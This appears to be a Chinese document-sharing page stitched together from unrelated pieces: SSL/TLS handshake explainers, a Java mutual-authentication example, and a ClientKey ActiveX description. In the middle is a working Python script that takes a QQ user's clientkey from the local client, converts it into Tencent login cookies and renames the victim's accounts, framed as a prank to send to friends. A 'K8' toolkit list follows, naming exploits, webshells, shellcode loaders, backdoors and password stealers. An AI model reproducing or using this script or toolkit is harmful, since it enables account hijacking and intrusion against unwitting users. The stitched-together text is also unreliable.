clientkey
SSL双向认证java实现

SSL双向认证java实现本文通过模拟场景,介绍SSL双向认证的java实现默认的情况下,我认为读者已经对SSL原理有一定的了解,所以文章中对SSL的原理,不做详细的介绍。
如果有这个需要,那么通过GOOGLE,可以搜索到很多这样的文章。
模拟场景:Server端和Client端通信,需要进行授权和身份的验证,即Client只能接受Server的消息,Server 只能接受Client的消息。
实现技术:JSSE(Java Security Socket Extension)是Sun为了解决在Internet上的安全通讯而推出的解决方案。
它实现了SSL和TSL(传输层安全)协议。
在JSSE中包含了数据加密,服务器验证,消息完整性和客户端验证等技术。
通过使用JSSE,开发人员可以在客户机和服务器之间通过TCP/IP协议安全地传输数据为了实现消息认证。
Server需要:1)KeyStore: 其中保存服务端的私钥2)Trust KeyStore:其中保存客户端的授权证书同样,Client需要:1)KeyStore:其中保存客户端的私钥2)Trust KeyStore:其中保存服务端的授权证书我们可以使用Java自带的keytool命令,去生成这样信息文件1)生成服务端私钥,并且导入到服务端KeyStore文件中keytool -genkey -alias serverkey -keystore kserver.keystore过程中,分别需要填写,根据需求自己设置就行keystore密码:123456名字和姓氏:stone组织单位名称:eulic组织名称:eulic城市或区域名称:HZ州或省份名称:ZJ国家代码:CNserverkey私钥的密码,不填写和keystore的密码一致:123456就可以生成kserver.keystore文件server.keystore是给服务端用的,其中保存着自己的私钥2)根据私钥,导出服务端证书keytool -export -alias serverkey -keystore kserver.keystore -file server.crtserver.crt就是服务端的证书3)将服务端证书,导入到客户端的Trust KeyStore中keytool -import -alias serverkey -file server.crt -keystore tclient.keystoretclient.keystore是给客户端用的,其中保存着受信任的证书采用同样的方法,生成客户端的私钥,客户端的证书,并且导入到服务端的Trust KeyStore中1)keytool -genkey -alias clientkey -keystore kclient.keystore2)keytool -export -alias clientkey -keystore kclient.keystore -file client.crt3)keytool -import -alias clientkey -file client.crt -keystore tserver.keystore如此一来,生成的文件分成两组服务端保存:kserver.keystore tserver.keystore客户端保存:kclient.keystore tclient.kyestore接下来,就采用JSSE,分别生成SSLServerSocket,SSLSocket服务端,生成SSLServerSocket代码SSLContext ctx = SSLContext.getInstance("SSL");KeyManagerFactory kmf = KeyManagerFactory.getInstance("SunX509"); TrustManagerFactory tmf = TrustManagerFactory.getInstance("SunX509");KeyStore ks = KeyStore.getInstance("JKS");KeyStore tks = KeyStore.getInstance("JKS");ks.load(new FileInputStream("data/kserver.keystore"), SERVER_KEY_STORE_PASSWORD .toCharArray());tks.load(new FileInputStream("data/tserver.keystore"), SERVER_TRUST_KEY_STORE_PA SSWORD.toCharArray());kmf.init(ks, SERVER_KEY_STORE_PASSWORD.toCharArray());tmf.init(tks);ctx.init(kmf.getKeyManagers(), tmf.getTrustManagers(), null);return (SSLServerSocket) ctx.getServerSocketFactory().createServerSocket(DEFAULT_PORT );客户端,生成SSLSocket的代码,大同小异SSLContext ctx = SSLContext.getInstance("SSL");KeyManagerFactory kmf = KeyManagerFactory.getInstance("SunX509");TrustManagerFactory tmf = TrustManagerFactory.getInstance("SunX509");KeyStore ks = KeyStore.getInstance("JKS");KeyStore tks = KeyStore.getInstance("JKS");ks.load(new FileInputStream("data/kclient.keystore"), CLIENT_KEY_STORE_PASSWORD.t oCharArray());tks.load(new FileInputStream("data/tclient.keystore"), CLIENT_TRUST_KEY_STORE_PAS SWORD.toCharArray());kmf.init(ks, CLIENT_KEY_STORE_PASSWORD.toCharArray());tmf.init(tks);ctx.init(kmf.getKeyManagers(), tmf.getTrustManagers(), null);return (SSLSocket) ctx.getSocketFactory().createSocket(DEFAULT_HOST, DEFAULT_PORT );如此,就完成了服务端和客户端之间的基于身份认证的交互。
SSLTLS安全握手协议

SSLTLS安全握手协议SSL/TLS安全握手协议SSL(Secure Sockets Layer)和TLS(Transport Layer Security)是一种加密协议,用于保护网络通信的安全性。
安全握手协议是SSL/TLS的一部分,被用于建立安全通信连接的过程。
本文将详细介绍SSL/TLS安全握手协议的流程和原理。
一、安全握手协议概述安全握手协议在SSL/TLS通信过程中起到了核心的作用,它用于验证服务器的身份、协商加密算法和密钥,并建立安全通道。
只有经过安全握手协议的双方才能进行加密通信,有效防止数据被窃取或篡改。
二、握手协议流程1. ClientHello:客户端向服务器发送一个包含加密规范和随机数的消息,用于协商握手参数。
2. ServerHello:服务器接收到客户端的请求后,选择一个加密规范和生成自己的随机数,然后发送给客户端。
3. Certificate:服务器在此阶段发送其公钥证书给客户端,客户端通过验证证书的合法性来确认服务器的身份。
4. ServerKeyExchange(可选):在某些情况下,服务器还需要发送一些附加的信息给客户端,用于辅助密钥交换过程。
5. CertificateRequest(可选):如果服务器要求客户端进行身份验证,会向客户端发送一个请求,要求其发送客户端证书。
6. ServerHelloDone:服务器发送表示握手过程结束的消息。
7. ClientCertificate(可选):如果服务器发送了CertificateRequest 消息,客户端会返回自己的证书。
8. ClientKeyExchange:客户端使用服务器的公钥来加密一个用于之后通信的随机对称密钥,并发送给服务器。
9. CertificateVerify(可选):如果客户端发送了自己的证书,服务器需要验证其有效性。
10. ChangeCipherSpec:客户端和服务器通过此消息告知对方之后的通信将使用协商好的加密规范和密钥。
QQ大盗-巧用clientkey

QQ⼤盗-巧⽤clientkey场景:1.将程序发给好友,好友打开 qq昵称就会被秒改为”账号已被盗“。
2.将程序运⾏在⾃⼰的电脑,让那些随意借⽤电脑看⽚聊天的室友产⽣⼀个觉悟:乱使⽤别⼈电脑很可能会泄露隐私。
思路:通过数据包模拟⽹页中的qq快速登录,拿到登录凭证(Cookie)修改qq昵称实现账号被盗的假象。
1、local_token:qq快速登录是基于qq的客户端实现的,qq客户端启动时会⽣成⼀个local_token(保存在本地的⼀个钥匙),通过local_token访问qq客户端的本地服务器(4301端⼝)可以获取到电脑上登录的所有qq账号。
2、clientkey:仅仅知道qq账号肯定是⽆法登录的,还要拿clientkey。
可以把clientkey理解成密码,qq客户端登录成功时会⽣成这个值,每个成功登录的账号都有⾃⼰的clientkey 相互匹配,只要拿到账号的clientkey就可以偷偷快速登录了。
3、cookies:前⾯两步其实都是在本地⽹络下完成的,验证于qq客户端的本地服务器。
现在提交uin+clientkey模拟快速登录是需要腾讯的远程服务器来验证的,验证通过就可以拿到登录凭证了(Cookies)。
4、ldw:通过前⼏步我们已经拿到登录凭证了,可以为所欲为访问腾讯所有web端的服务了,现在我想修改账号的昵称。
我选择了通过qq个⼈中⼼的⼀个接⼝修改昵称,这个接⼝需要⼀个ldw值,并不复杂,⼀个get请求就能拿到。
实现:以下使⽤python编程语⾔操作。
from urllib import requestfrom http import cookiejarimport jsonimport reopener=Nonecookie=Nonelocal_token=Nonejson_uins=Nonedef modNick(index,nick):clientuin=json_uins[index]['account']clientkey=Noneldw=None#拿到clientkeyurl = 'https://:4301/pt_get_st?clientuin='+clientuin+'&callback=ptui_getst_CB&r=0.810010167110566&pt_local_tk=' + local_tokenopener.open(url)for item in cookie:if ( == 'clientkey'):clientkey = item.valuebreak#登录url='https:///qqid?pt_clientver=5563&pt_src=1&keyindex=9&sid=5&ptlang=2052&clientuin='+clientuin+'&clientkey='+clientkeyopener.open(url)#拿到ldwurl="/cgi-bin/get_base_key?r=0.9431299830075388"opener.open(url)for item in cookie:if ( == 'ldw'):ldw = item.valuebreak#修改昵称url = '/cgi-bin/userinfo_mod'data = '&n=' + nick + '&ldw=' + ldwres = opener.open(url, bytes(data, 'utf-8'))data = res.read()if__name__=='__main__':#opener初始化cookie=cookiejar.CookieJar()opener=request.build_opener(request.HTTPCookieProcessor(cookie))opener.addheaders = [('Referer','https://')]#拿到local_tokenurl='https:///cgi-bin/xlogin?appid=1006102&daid=1&style=23&hide_border=1&proxy_url=http%3A%2F%%2Flogin%2Fproxy.html&s_url=/index.html' opener.open(url)for item in cookie:if( == 'pt_local_token'):local_token=item.valuebreak#拿到uinsurl='https://:4301/pt_get_uins?callback=ptui_getuins_CB&r=0.21624413130736064&pt_local_tk='+local_tokenres=opener.open(url)json_uins=json.loads(pile('var var_sso_uin_list=(.*?);').findall(str(res.read(),'utf-8'))[0])#修改昵称for index in range(0,len(json_uins)):modNick(index, '帐号已被盗!')最后说⼏句:改个昵称啥的都是⼩事情,拿到Cookies可以做到的事情太多了。
数字证书、公钥和私钥这三者之间的关系是什么

根据非对称密码学的原理,每个证书持有人都有一对公钥和私钥,这两把密钥可以互为加解密。
公钥是公开的,不需要保密,而私钥是由证书持人自己持有,并且必须妥善保管和注意保密。
数字证书则是由证书认证机构(CA)对证书申请者真实身份验证之后,用CA的根证书对申请人的一些基本信息以及申请人的公钥进行签名(相当于加盖发证书机构的公章)后形成的一个数字文件。
CA完成签发证书后,会将证书发布在CA的证书库(目录服务器)中,任何人都可以查询和下载,因此数字证书和公钥一样是公开的。
可以这样说,数字证书就是经过CA认证过的公钥,而私钥一般情况都是由证书持有者在自己本地生成的,由证书持有者自己负责保管。
具体使用时,签名操作是发送方用私钥进行签名,接受方用发送方证书来验证签名;加密操作则是用接受方的证书进行加密,接受方用自己的私钥进行解密。
因此,如果说数字证书是电子商务应用者的网上数字身份证话,那么证书相应的私钥则可以说是用户的私章或公章SSL由两个共同工作的协议组成:"SSL 记录协议"(SSL Record Protocol)和"SSL 握手协议"(SSL Handshake Protocol)。
SSL 记录协议建立在可靠的传输协议(如TCP)之上,为高层协议提供数据封装、压缩、加密等基本功能的支持;SSL 握手协议建立在SSL记录协议之上,用于在实际的数据传输开始前,通信双方进行身份认证、协商加密算法、交换加密密钥等。
SSL握手协议包含两个阶段,第一个阶段用于建立私密性通信信道,第二个阶段用于客户认证。
第一阶段是通信的初始化阶段,在此阶段,首先SSL要求服务器向浏览器出示证书;然后浏览器中的SSL软件发给服务器一个随机产生的传输密钥,此密钥由已验证过的公钥加密,随机产生的传输密钥是核心机密,只有客户的浏览器和此公司的Web服务器知道这个数字序列。
第二阶段的主要任务是对客户进行认证,此时服务器已经被认证了。
SSLTLS协议中的握手过程详解

SSLTLS协议中的握手过程详解SSL/TLS协议中的握手过程详解SSL/TLS(安全套接层/传输层安全)协议是一种用于保护网络通信安全的加密协议。
在网络传输中,客户端和服务器之间的握手过程是建立安全通信的基础。
本文将详细解释SSL/TLS协议中的握手过程,以帮助读者更好地理解和应用该协议。
1. 握手协议介绍握手协议是SSL/TLS协议的重要组成部分,用于验证服务器的身份,并协商加密算法和密钥。
握手协议的主要目的是建立安全通道,确保通信的保密性、完整性和可信性。
2. 握手过程概述SSL/TLS握手过程包括以下步骤:2.1 客户端发送ClientHello在握手开始时,客户端向服务器发送ClientHello消息,包含了支持的SSL/TLS版本、加密算法和压缩方法等信息。
此消息允许服务器选择合适的参数进行后续握手协商。
2.2 服务器发送ServerHello服务器收到ClientHello消息后,选择合适的加密算法和相关参数,并向客户端发送ServerHello消息。
ServerHello消息包含服务器选择的SSL/TLS版本、加密算法和密钥等信息。
2.3 服务器发送Certificate服务器发送Certificate消息,将服务器的公钥证书发送给客户端。
客户端可以使用该证书验证服务器的身份,并获取服务器的公钥用于后续的密钥协商。
2.4 服务器发送ServerKeyExchange(可选)在某些情况下,服务器可能会发送ServerKeyExchange消息,用于向客户端发送临时公钥或其他参数,以供密钥协商使用。
这一步骤并非必需,只有在服务器需要向客户端提供额外信息时才会发送。
2.5 服务器发送ServerHelloDone服务器发送ServerHelloDone消息,通知客户端握手过程的结束。
客户端接收到该消息后,即可开始验证服务器的证书和进行密钥协商。
2.6 客户端发送ClientKeyExchange客户端生成一个随机的PreMaster Secret,并使用服务器的公钥加密,并将其发送给服务器,即ClientKeyExchange消息。
SSL交互过程

SSL消息按如下顺序发送:1.Client Hello客户发送服务器信息,包括它所支持的密码组。
密码组中有密码算法和钥匙大小;2.Server Hello服务器选择客户和服务器都支持的密码组到客户。
3.Certificate服务器发送一个证书或一个证书链到客户端,一个证书链开始于服务器公共钥匙证书并结束于证明权威的根证书。
这个消息是可选的,但服务器证书需要时,必须使用它。
4.Certificate request当服务器需要鉴别客户时,它发送一个证书请求到客户端。
在网络程序中,这个消息很少发送。
5.Server key exchange服务器当发送来的公共钥匙对钥匙交换不是很充分时,发送一个服务器钥匙交换消息。
6.Server hello done服务器告诉客户完成它的初始化流通消息。
7.Certificate假如服务器需要一个客户证书时,客户端发送一个证书链。
(只有在服务器需要客户证书时) 8.Client key exchange客户产生用于对称算法的一个钥匙。
对RSA客户用服务器公共钥匙加密这个钥匙信息并把它送到服务器。
9.Certificate verify在网络程序中,这个消息很少发送,它主要是用来允许服务器结束对客户的鉴别处理。
当用这个消息时,客户发送用密码函数的数字签名的信息到服务端,当服务端用公共钥匙解密这个消息时,服务器能够鉴别客户。
10.Change cipher spec客户发送一个消息告诉服务器改变加密模式。
11.Finished客户告诉服务器它已准备安全数据通信。
12.Change cipher spec服务器发送一个消息到客户端并告诉客户修改加密模式。
13.Finished服务器告诉客户端它已准备好安全数据通信。
这是client-server握手协议最后一步。
14.Encrypted data客户同服务器用对称加密算法和密码函数,并用客户发送到服务器的秘密钥匙加密通信。
K8工具集——精选推荐

K8⼯具集K8⼯具集⽐较全,底部有下载⽹址。
综合⼯具[+] 扫描⼯具 K8Cscan5.3 ⼤型内⽹渗透扫描器内置27个功能,⽀持Cobalt Strike[+] 综合⼯具 K8飞⼑Final.rar[+] K8data.mdb K8飞⼑漏洞数据库20190402[+] K8expList.txt K8飞⼑漏洞利⽤列表提权⼯具[+] 提权⼯具 CVE-2019-0803.exe Win32k漏洞提权⼯具[+] 提权⼯具 iislpe.exe IIS全版本提权(仅限IIS帐户、服务帐户)[+] 提权⼯具 pr.exe pr有参版 pr0⽆参版(巴西烤⾁:国内10年所说的PR或IIS6提权)[+] 提权⼯具 k8uac_20181125[K8].rar ⽬前还⽀持全版本WIN7-Win10[+] 提权⼯具 bypassUAC_Win7_10[K8team].rar 13还是15年?Win10打补丁失效[+] 提权⼯具 bypassUACexe_0419[K8].rar 13年的吧打补丁的WIN7好像不⽀持了[+] 提权⼯具 Lpk提权_K8.rar DLLHijack[+] 提权⼯具 Usp10提权_K8.rar DLLHijack[+] 提权⼯具 MS11-046.exe[+] 提权⼯具 MS11-080.exe[+] 提权⼯具 MS14-068 EXP域内提权神器.rar[+] 提权⼯具 MS15-010提权[K8team]_20150603.rar[+] 提权⼯具 MS15-051提权 CVE-2015-1701_20150525[K8].rar[+] 提权⼯具 MS15-077提权⼯具[K8].rar[+] 提权⼯具 MS16-016提权EXP[K8].rar[+] 提权⼯具 Windows Win32k.sys EPATHOBJ 0day Exploit 提权⼯具 [K8team].rar[+] 提权⼯具 k8downexec.mof[+] 提权⼯具 k8zzz.rar SMB溢出⽀持执⾏⾃定义exe程序[+] 提权⼯具 udf.dll MYSQL udf提权DLL[+] 提权⼯具 ws2help提权_K8.rar[+] 提权⼯具卡巴6.0.2.614提权.exe[+] 提权⼯具⼩红伞 Avira avipbb.sys 提权Exploit_1024[K8].rar[+] 提权⼯具提权Admin2SystemRun_0419[K8].rar[+] 提权⼯具提权GetTrustedInstaller_0419[K8].rar[+] 提权⼯具降权System2AdminRun_0419[K8].rar[+] 提权⼯具⽆NET添加⽤户提权_20140511[K8].rar[+] 提权⼯具 K8_VBS提权脚本免杀⽣成器.rar[+] 进程注⼊ DLL注⼊进程⼯具过UAC[+] 提权⼯具 NV显卡提权NVexploit.rar[+] 提权⼯具 net2.0day.exe[+] 提权⼯具 K8dllhijack.rar DLL却持测试⼯具[+] 提权⼯具 Invoke-MS16-032.ps1[+] Apache 2.2.1.4 mod_isapi exploit.rar漏洞利⽤[+] 漏洞利⽤ K8飞⼑-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)[+] 漏洞利⽤ K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)[+] 漏洞利⽤ cve-2019-0604 SharePoint RCE exploit[+] 漏洞利⽤ K8_JbossExp.exe Jboss Jmx-console exploit[+] 漏洞利⽤ K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar[+] 漏洞利⽤ CVE-2018-2628 Weblogic GetShell EXPLOIT[+] 漏洞利⽤ ColdFusion 8 LFI EXP[+] 漏洞利⽤ K8_TomcatExp_1124[K.8].rar[+] 漏洞利⽤ WordPress 4.2 XSS 0day 20150429[K.8].rar[+] 漏洞利⽤ k8_zabbix_exp_20160820[K.8].rar漏洞利⽤[+] 漏洞利⽤ K8飞⼑-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)[+] 漏洞利⽤ K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)[+] 漏洞利⽤ K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar[+] 漏洞利⽤ CVE-2018-2628 Weblogic GetShell EXPLOIT[+] 漏洞利⽤ ColdFusion 8 LFI EXP[+] 漏洞利⽤ K8_TomcatExp_1124[K.8].rar[+] 漏洞利⽤ WordPress 4.2 XSS 0day 20150429[K.8].rar[+] 漏洞利⽤ k8_zabbix_exp_20160820[K.8].rar漏洞利⽤[+] 漏洞利⽤ K8飞⼑-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)[+] 漏洞利⽤ K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)[+] 漏洞利⽤ K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar[+] 漏洞利⽤ CVE-2018-2628 Weblogic GetShell EXPLOIT[+] 漏洞利⽤ ColdFusion 8 LFI EXP[+] 漏洞利⽤ K8_TomcatExp_1124[K.8].rar[+] 漏洞利⽤ WordPress 4.2 XSS 0day 20150429[K.8].rar[+] 漏洞利⽤ k8_zabbix_exp_20160820[K.8].rar[+] 漏洞利⽤ K8_Ecshop_Exploit[+] 漏洞利⽤ Magento 1.7.0.2 漏洞EXP_20150624[K.8].rar[+] 漏洞利⽤ K8COOKIE.rar Cookie注⼊⼯具[+] 漏洞利⽤ Jboss_invoke_Exp_k8.rar MSF脚本[+] 漏洞利⽤ DB_Owner_GetShell_K8.rar MSSQL DB权限拿SHELL⼯具挂马⼯具[+] 挂马⼯具 K8domainVBS.exe K8域控植⼊脚本⽣成器[+] 挂马⼯具 K8ARPTool.rar 内⽹ARP⼯具批量挂马[+] 挂马⼯具 CHM⽹马⽣成器.exe[+] 0day漏洞 K8飞⼑内置5个0day漏洞利⽤(Word漏洞\IE神洞\WVS\RAR)[+] 0day漏洞 [视频]BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team.rar[+] 0day漏洞 [视频]Hacking Team Flash 0day样本(Firefox IE)完美触发_20150707[K8].rar漏洞环境[+] 漏洞环境 K8-ASP注⼊漏洞环境.rar[+] 漏洞环境 k8bbs(php+mysql)注⼊漏洞环境.rar[+] 漏洞环境 K8 SQL强化练习⼯具V1.0_20190301[K8].rar[+] 漏洞环境 K8迷你ASP服务器.exe 绿⾊⼀键启动免杀⼯具[+] 免杀⼯具 scrunBase64 ShellCode免杀加载器(CS & MSF)[+] 免杀⼯具 scrunBase32 ShellCode免杀加载器(CS & MSF)[+] 免杀⼯具 scrun.exe & scrun.py ShellCode免杀加载器(CS & MSF)[+] 免杀⼯具 K8_SC_ENCODE(CS & Msf免杀⼯具).rar[+] 测试⼯具 K8shellcodeLoader.exe Shellcode测试[+] 免杀⼯具 K8随机免杀花指令⽣成器V2.0.exe[+] 免杀⼯具 K8数字签名添加器.exe[+] 捆绑⼯具 K8免杀系统⾃带捆绑器加强版V2.0.EXE远控后门[+] 远控后门 K8_Gh0st_Bin.rar 不免杀漏洞测试上线⽤[+] 远控后门 TeamServer.exe CS中转Win版,⽆需Kali下⽣成cobaltstrike.store⽂件[+] 远控后门 QQ远控 ClientKey 利⽤⼯具.rar 不免杀18年仍然可⽤19年未测估计也还⾏[+] 远控后门 vncdoor.exe VNC后门可正反向[+] 远控后门 k8_SSH_Manage.exe 渗透专⽤SSH(执⾏完后⽴即销毁会话,不像putty保存会话常暴露IP)[+] 连接⼯具 sshcmd.exe 渗透专⽤SSH(执⾏完后⽴即销毁会话,同时清除连接IP)[+] 连接⼯具 sshshell.exe 交互式SSH类似putty保持会话(⽬标显⽰IP⼀直连着)[+] 远控后门 K8⼿机远控电脑V1.1_20121020[K.8].rar[+] 远控后门 JspShellExec CMD下JSP⼀句话连接⼯具[+] 捆绑⼯具 K8_rarBind.rar RAR捆绑⼯具嗅探⼯具[+] 嗅探⼯具 K8getPC.py 内⽹存活主机探测(⽆需端⼝\⽆视防⽕墙)扫描⼯具[+] 扫描⼯具 K8Cscan5.0.rar ⼤型内⽹渗透扫描器内置22个功能,⽀持Cobalt Strike[+] 扫描⼯具 K8PortScan开源跨平台⼤型⽹络端⼝扫描器(Bin: Windows/Kali/SUSE)[+] 扫描插件 K8Cscan Moudle WebLogicScan.rar Weblogic通⽤GetShell[+] 扫描插件 K8Cscan Moudle CiscoScan.rar Cisco思科探测插件[+] 扫描插件 K8Cscan Moudle OSScan2.rar 系统版本探测插件2[+] 扫描插件 K8Cscan Moudle PortScan.cs 端⼝扫描插件源码[+] 扫描插件 K8Cscan Moudle FtpScan.rar Ftp密码扫描插件[+] 扫描插件 K8Cscan Moudle MysqlScan.rar Mysql密码扫描插件[+] 扫描插件 K8Cscan Moudle OnlinePC.rar 存活主机扫描插件[+] 扫描插件 K8Cscan Moudle WebBanner.rar WebBanner标题扫描插件[+] 扫描插件 K8Cscan Moudle WmiScan.rar Wmi扫描Win系统密码插件[+] 扫描⼯具 K8Cscan for SameWeb.rar C段旁站扫描⼯具[+] 扫描⼯具 K8Cscan for SubDomain.rar ⼦域名扫描⼯具[+] 扫描⼯具 cping3.0.rar ⼤型内外⽹渗透主机扫描⼯具[+] 扫描⼯具 K8_C段旁注⼯具6.0[+] 扫描⼯具 s加强版.exe[+] 扫描⼯具 K8openssl批量 Bat版.rar[+] 扫描⼯具 K8破壳SMTP Bat版.rar[+] 扫描⼯具 WPdetection.exe WordPress站点信息获取[+] 扫描⼯具 K8-S2批量.rar Struts2批量⼯具[+] 扫描⼯具 smbcheck.exe MS17-010漏洞检测,cping、cscan批量专⽤数据库[+] 脱库⼯具 K8mysqlCmd.rar Mysql数据库免驱连接⼯具[+] 脱库⼯具 K8_mysql脱裤20170114(千万).php[+] 脱库⼯具 K8Packwebshell.aspx 整站打包⼯具[+] 脱库⼯具 K8outSQL.aspx MSSQL导库⼯具加密解密[+] K8飞⼑⾥⼤量加密解密算法、编码解码、SQL注⼊、XSS等[+] 密码破解 SharpWeb.exe 浏览器帐密读取⼯具(Firefox/Chorme/IE)[+] 密码破解 laZagne.exe 本地密码检索⼯具(⽀持XP/2003)[+] 密码破解 sshtest.exe SSH密码登陆测试可结合Cscan进⾏批量破解[+] 嗅探⼯具 k8ftpsniffer.py FTP[+] 密码破解 K8_DNN_Password_Decrypt_20161110.rar dotnetnuke密码解密⼯具[+] 密码破解 Invoke-Mimikatz.ps1 Mimikatz 20181209[+] 密码破解 mz.exe Mimikatz-2.1.1-20181209 X86 ⼀键版[+] 密码破解 mz64.exe Mimikatz-2.1.1-20181209 X64 ⼀键版[+] 密码破解 K8_FTP爆破PHP脚本20151010.rar 内⽹渗透⽤[+] 密码破解 K8_Mysql爆破PHP脚本20151009.rar 内⽹渗透⽤[+] 密码破解 K8_ipcscan 爆破IPC⾃动种马⼯具+教程.rar[+] 密码破解 weblogic密码解密⼯具(exe & jar)[+] 密码破解 K8fuckVNC.rar k8vncpwd.exe VNC密码解密⼯具[+] 密码破解 K8getTeamViewPWD_20150705[K.8].rar[+] 密码破解 K8正⽅密码解密⼯具_20150801[K.8].rar[+] 密码破解 getBrowserPWD_1124[K.8].rar Firefox\Ghrome 浏览器密码读取⼯具[+] 密码破解 getvpnpwd.exe VPN、ADSL宽带帐密读取⼯具(仅限XP、2003)[+] 密码破解 GetPassword_x64.rar GetPwd_K8.rar ⼀键获取明⽂[+] 密码破解 K8_FuckOneShell ⼀句话密码爆破秒破10万[+] 加密解密 K8Base32_Decode_20161110.rar[+] 斛密⼯具 k8ungzip.exe GZIP ⽤于提取0day⽹马Powershell执⾏PAYLOAD[+] 密码破解 K8FTP密码破解器V2.0_20190301[K8].rar[+] 密码破解 K8Access数据库密码读取器_20190301[K8].rar[+] 加密⼯具 K8_FileHideImg.exe 任意⽂件隐藏⾄图⽚⼯具安全辅助[+] 安全⼯具 K8⽊马病毒后门监视器V3.0.rar 捆绑后门⽊马释放路径、Shell上传路径查看[+] 安全⼯具 K8进程拦截.rar (⽐⽅说访问⽹页浏览器调⽤外站EXE执⾏说明0day来了,⽽且可防⽌⽊马运⾏)[+] 安全⼯具 K8驱动防⽌WebShell提权⼯具.rar (就是说⽆法通过WEBSHELL执⾏任意命令,就算有签名的EXE也不⾏) [+] 辅助⼯具 K8注册表跳转.exe转发代理[+] 端⼝转发 PortTran.rar .NET端⼝转发⼯具[+] 端⼝转发 K8PortMap.exe D7端⼝映射⼯具WebShell[+] 转换⼯具 k8exe2bat.exe 任意⽂件转Bat⼯具(WebShell⽆法上传EXE解决⽅案)[+] 上传⼯具 K8upload_1125[K8].rar 新型⼩马上传⼯具⽀持任意⽂件(内置asp\php\jsp⼩马)[+] 连接⼯具 K8⼀句话ASP⽊马客户端加强程序版.exe[+] WebShell k8cmd.ascx[+] WebShell k8cmd.pl[+] WebShell k8cmd.py[+] WebShell k8飞⼑CMD.jsp[+] WebShell K8飞⼑A专⽤UA⼀句话⽊马.asp[+] WebShell K8飞⼑PHP-专⽤UA⼀句话⽊马.php[+] WebShell K8飞⼑专⽤UA⼀句话⽊马.asxp[+] WebShell shellcode.aspx硬件渗透[+]BadUSB K8飞⼑内含有⼤量Teensy渗透功能脚本⾃⾏研究[+]BadUSB Teensy 兼容所有Windows和Linux系统下载者.ino其它⼯具[+]教程录制 K8屏幕录像⾼压缩率版_20190301[K8].rar[+]系统美化 K8⽂件夹个性设置⼯具.exe[+]系统美化 K8个性桌⾯右键菜单.exe[+]搜索⼯具 K8吉他谱搜索⼯具_20190301[K8].rar[+]系统美化图标提取器.exe[+]系统美化 k8cmd.exe[+]辅助⼯具 K8侠盗猎车4外挂.exe[+]辅助⼯具 K8迅雷、快车、旋风地址互换⼯具.exe注意:只限学习使⽤切勿进⾏破坏。
TLS1.0协议

TLS1.0协议TLS1.0 协议发布于1999年初。
该协议可在Internet中提供给通信双⽅⼀条私有信道,即对通信消息进⾏加密。
该协议主要描述了通信密钥协商的⽅法与通信格式的定义。
分别由TLS Handshake Protocol 和 TLS Record Protocol两个⼦协议进⾏描述。
虽然TLS1.0已经退出了历史舞台,但其最初的TLS设计核⼼过程并⽆太⼤变化。
因此有助于理解TLS协议的执⾏过程。
TCP协议为TLS协议提供传输层服务, TLS Record Protocol在TCP协议层之上,向上提供两种服务:1. 通信双⽅的连接是私有的。
通信过程时的数据加密⽅式采⽤对称加密。
对于每⼀条连接来说,都有其唯⼀的对称密钥。
⽤于加密数据的对称密钥是由TLS Handshake Protocol协商得到的。
在特殊情况下,TLS Record Protocol层的数据也可以不被加密。
2. 通信双⽅的连接是可靠的。
消息在传递过程中需要包含消息校验码(MAC),消息校验码采⽤Hash函数对消息进⾏摘要得出。
TLS Handshake Protocol提供密钥协商服务,该协议允许服务器与客户端相互验证对⽅⾝份、协商对称加密算法及对称密钥:1. 使⽤公钥加密体系对通信双⽅进⾏⾝份认证。
⾝份认证过程的参与者是可选的,但⾄少对其中⼀⽅进⾏验证。
2. 协商过程中的共享秘密是安全的。
协商秘密的过程中,攻击者难以通过截获协商过程中的数据,来推导出通信双⽅的共享秘密。
3. 协商过程是可信的。
攻击者不可能修改协商过程中的数据在TLS中,多数操作是需要消息MAC(消息认证码)来验证消息的真实性。
传统的消息认证码,仅仅是对消息进⾏Hash得以获取,因此易于攻击者对其进⾏伪造。
若通过对MAC⽣成过程中添加私有秘密的⽅法来⽣成消息认证码,伪造过程将⼗分困难(因为必须要猜出私有秘密)。
使⽤HMAC作为消息认证码。
HMAC的⽣成可以使⽤多种不同的Hash算法。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
ClientKey基于目前微软公司流行的ACTIVEX技术开发,是专门用来增强网站会员帐号安全性的ACTIVEX控件。
当您的网站使用ClientKey控件后,网站会员的帐号将会与他们所使用的机器相互绑定,绑定后的帐号将不能在非绑定的机器上登陆网站,从而加强了会员帐号的安全性,同时也保护了网站的利益,避免了同一帐号被多人使用。
ClientKey支持Microsoft公司的WINDOWS系列操作系统(Windows 98、Windows 2000家族、Windows XP家族以及Windows 2003家族)。
同时应装有Microsoft Internet Explorer 6.0 SP1以上版本的浏览器,在安装了Microsoft Internet Explorer 6.0 SP1后,ClientKey也将同时支持其他使用Microsoft Internet Explorer 内核的第三方浏览器,如MYIE2、腾讯TT等。
由于ClientKey是基于Microsoft公司的ACTIVEX技术开发的WEB前台控件,故使用ClientKey 对网站的后台开发环境没有特殊要求,支持ASP、PHP、JSP、、CGI 等各种开发语言。
您可以非常方便的将ClientKey应用到您的网站中。
如果你的QQ是在线状态,那么你用IE内核的浏览器打开腾讯的相关产品登录页面(/或者等),那么会看到如下情况:它会自动检测登录,这种神奇的技术是clientkey,基于ACTIVEX技术开发(所以说必须在IE内核的浏览器上才能看见上面的效果)。
